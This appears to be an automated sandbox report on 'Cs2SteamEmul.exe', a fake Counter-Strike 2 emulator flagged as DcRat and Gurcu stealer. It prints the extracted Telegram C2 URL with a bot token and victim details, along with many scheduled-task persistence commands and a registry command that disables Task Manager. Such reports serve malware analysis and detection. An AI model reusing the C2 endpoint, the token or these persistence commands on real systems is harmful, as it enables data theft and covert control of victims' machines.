Overview

overview

10

Static

static

10

Cs2SteamEmul.exe

windows10-1703-x64

10

Cs2SteamEmul.exe

windows7-x64

10

Cs2SteamEmul.exe

windows10-1703-x64

10

Cs2SteamEmul.exe

windows10-2004-x64

10

Cs2SteamEmul.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    30s
  • max time network
    34s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags

    arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23-07-2024 04:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Cs2SteamEmul.exe

  • Size

    2.8MB

  • MD5

    d48669a634489ed4baf9e84aedd9d2bd

  • SHA1

    e7b7bdf6e10584eb07547e7237bd654b42abcf84

  • SHA256

    4415d417dd1b3ccd3c86fa55cf3add99e493218cb0c1405efaf8e55ac7b5c666

  • SHA512

    d902e3d77f7cc33f806b1e298fb51905636bb9ea83cf5a030c18ed33400e656edf3223a0ff4f6e7fcef20b427413cbf5a5132b914d37f476cd4ad6d90db46a90

  • SSDEEP

    49152:8bA3W4Dw1beHhL/rBnVQzQ2Bq5U+0HE26wyiK4Csx7aPNUmTk:8b6PHhXB6e2dHfxJ1xu/k

Score
10/10
dcratgurcuevasioninfostealerpersistenceratstealer

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6979274084:AAEyYu9GraaLRF3G8cNhU_3K2BT8GSrxiUE/sendPhoto?chat_id=5314031191&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20645063668d17ff5429f7855e369fa0c38d2b1733%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20WNIKVPKE%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CUsers%5CAll%20Users%5CMozilla-1de4eec8-1241-4177-a864-e594e8d1fb38%5Cupdates%5C308046B0AF4A39CB%5Cwinlogon.ex

Signatures

  • DcRat 56 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

    stealergurcu
  • Modifies WinLogon for persistence 2 TTPs 18 IoCs
    persistence
  • Process spawned unexpected child process 54 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 2 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • Disables Task Manager via registry modification
    evasion
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 34 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 54 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Cs2SteamEmul.exe
    "C:\Users\Admin\AppData\Local\Temp\Cs2SteamEmul.exe"
    1⤵
    • DcRat
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2776
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ChainSurrogateref\s70leb7kkd32CLdRUKa.vbe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5844
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\ChainSurrogateref\xpD7eJ.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5896
        • C:\ChainSurrogateref\hyperBrowser.exe
          "C:\ChainSurrogateref\hyperBrowser.exe"
          4⤵
          • DcRat
          • Modifies WinLogon for persistence
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2828
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hE4YweB2y9.bat"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:672
            • C:\Windows\system32\w32tm.exe
              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
              6⤵
                PID:3296
              • C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\winlogon.exe
                "C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\winlogon.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:6064
          • C:\Windows\SysWOW64\reg.exe
            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            4⤵
            • Modifies registry key
            PID:4660
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\VisualElements\smss.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1180
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\VisualElements\smss.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2112
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\VisualElements\smss.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1632
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Mail\spoolsv.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:5496
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\spoolsv.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:3400
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Mail\spoolsv.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1360
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 5 /tr "'C:\ChainSurrogateref\SearchHost.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1612
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "SearchHost" /sc ONLOGON /tr "'C:\ChainSurrogateref\SearchHost.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:3472
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 6 /tr "'C:\ChainSurrogateref\SearchHost.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:3288
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2924
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1168
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:6132
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\ChainSurrogateref\csrss.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1856
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\ChainSurrogateref\csrss.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2212
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\ChainSurrogateref\csrss.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2356
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dwm.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1680
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dwm.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2164
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dwm.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:3448
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\ChainSurrogateref\conhost.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1940
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ChainSurrogateref\conhost.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:4668
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\ChainSurrogateref\conhost.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:3436
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\spoolsv.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:3552
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\spoolsv.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:480
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\spoolsv.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2760
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\Speech\RuntimeBroker.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1900
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Speech\RuntimeBroker.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:5172
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech\RuntimeBroker.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1668
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 14 /tr "'C:\ChainSurrogateref\SearchHost.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:5668
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "SearchHost" /sc ONLOGON /tr "'C:\ChainSurrogateref\SearchHost.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2388
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 12 /tr "'C:\ChainSurrogateref\SearchHost.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:5436
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\winlogon.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:644
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\winlogon.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:568
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\winlogon.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2744
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\fontdrvhost.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:3856
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\fontdrvhost.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:788
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\fontdrvhost.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:4156
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\SppExtComObj.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2376
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\SppExtComObj.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:5672
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\SppExtComObj.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:832
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Windows\Setup\State\sppsvc.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:844
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\Setup\State\sppsvc.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:492
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Windows\Setup\State\sppsvc.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1664
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\ChainSurrogateref\smss.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1700
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\ChainSurrogateref\smss.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:3900
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\ChainSurrogateref\smss.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:4052
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\Uninstall Information\smss.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1996
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\smss.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:3780
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Program Files\Uninstall Information\smss.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2732
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Pictures\cmd.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:2068
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Public\Pictures\cmd.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:4608
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Pictures\cmd.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:756
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:4504
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:1156
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /rl HIGHEST /f
      1⤵
      • DcRat
      • Process spawned unexpected child process
      • Scheduled Task/Job: Scheduled Task
      PID:6076
    • C:\Windows\system32\wbem\WmiApSrv.exe
      C:\Windows\system32\wbem\WmiApSrv.exe
      1⤵
        PID:5892

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ChainSurrogateref\hyperBrowser.exe
        Filesize

        2.5MB

        MD5

        fb9e236436cde0a5a4eed038eaddcba0

        SHA1

        b952200d5fc543b905081e871d0f17cd86fe614f

        SHA256

        cbc2a097f5d12d79a5b79af092afba8eee19305a82e3663bcdf7a312bf3b6d49

        SHA512

        22c83c980a1df703d66f10ea11caaf187c9081c5b85039e4206f4a34418bc030af3baee128873e7bb6f45bd59132cc6191fd9fba3c8818d94c81105ec11a130c

        Download Submit

      • C:\ChainSurrogateref\s70leb7kkd32CLdRUKa.vbe
        Filesize

        211B

        MD5

        4410becb8d48b0f40a82e8d65460e611

        SHA1

        23971351f410149ee5f076de87985cd6b4ab49dc

        SHA256

        ce4270f5351b45f9a102cb09b20dec64956cb4ab81a36fb6efa0689ab8755ce5

        SHA512

        539bfef68779f8c70a82346bb2410fe335a79cecba2c17f4d4f8d83e74ed85a6cd1d36ad4a55945b7283e73de65cec7aa45280c9f19e49a4d0f316857d42a3ed

        Download Submit

      • C:\ChainSurrogateref\xpD7eJ.bat
        Filesize

        162B

        MD5

        eaa1aa25e323d5ea76d80a5ddbfeca3c

        SHA1

        a9ce156083afb97e63800dda5ee1e99d845b3a18

        SHA256

        7bd09663e812891268d97ecf21ea8d6669252fdcb2d3e24c9834252cadc21263

        SHA512

        f8d204db10ac0b32ebcd9266c4022d342fd2a7a520428eb585dbda826d79ed8744ed6dfd196821bb8bca6a786eabf77af2acbf0080db488e54b07abe1cf78aa7

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\hE4YweB2y9.bat
        Filesize

        266B

        MD5

        4da2209ef11747aa8c538c7b0f52eaff

        SHA1

        054c192324e1ae39ad88618aba0e112eb091e0ab

        SHA256

        ac91ebcf7b54297aec1849e9211cbe994ed495ae4f166f69222338fdf9f73d74

        SHA512

        059390459cdba5a081b07a26b67e45d0b0e0804516e2293064780a7663f865e606ba58b18c6cf81d15d136a89ea8d31a79c045f0176c871dd68eb8a8ddcd513a

        Download Submit

      • memory/2828-21-0x000000001B7F0000-0x000000001B802000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2828-25-0x000000001B8E0000-0x000000001B8EE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/2828-15-0x000000001B800000-0x000000001B850000-memory.dmp

        Filesize

        320KB

        Download

      • memory/2828-18-0x000000001B7D0000-0x000000001B7D8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2828-19-0x000000001B850000-0x000000001B8A6000-memory.dmp

        Filesize

        344KB

        Download

      • memory/2828-17-0x000000001B7B0000-0x000000001B7C6000-memory.dmp

        Filesize

        88KB

        Download

      • memory/2828-16-0x000000001B140000-0x000000001B148000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2828-20-0x000000001B7E0000-0x000000001B7EC000-memory.dmp

        Filesize

        48KB

        Download

      • memory/2828-13-0x0000000000260000-0x00000000004F2000-memory.dmp

        Filesize

        2.6MB

        Download

      • memory/2828-22-0x000000001BDF0000-0x000000001C318000-memory.dmp

        Filesize

        5.2MB

        Download

      • memory/2828-23-0x000000001B8C0000-0x000000001B8CC000-memory.dmp

        Filesize

        48KB

        Download

      • memory/2828-14-0x000000001B120000-0x000000001B13C000-memory.dmp

        Filesize

        112KB

        Download

      • memory/2828-24-0x000000001B8D0000-0x000000001B8DC000-memory.dmp

        Filesize

        48KB

        Download

      • memory/2828-26-0x000000001B8F0000-0x000000001B8FE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/2828-27-0x000000001BAC0000-0x000000001BACA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2828-12-0x00007FFF35273000-0x00007FFF35275000-memory.dmp

        Filesize

        8KB

        Download

      • memory/6064-73-0x000000001D550000-0x000000001D562000-memory.dmp

        Filesize

        72KB

        Download

      • memory/6064-74-0x000000001F190000-0x000000001F352000-memory.dmp

        Filesize

        1.8MB

        Download

      • memory/6064-79-0x000000001E7B0000-0x000000001E7BB000-memory.dmp

        Filesize

        44KB

        Download

      • memory/6064-78-0x000000001E790000-0x000000001E7AE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/6064-77-0x000000001E780000-0x000000001E78D000-memory.dmp

        Filesize

        52KB

        Download

      • memory/6064-76-0x000000001D010000-0x000000001D019000-memory.dmp

        Filesize

        36KB

        Download

      • memory/6064-75-0x000000001E980000-0x000000001E9C6000-memory.dmp

        Filesize

        280KB

        Download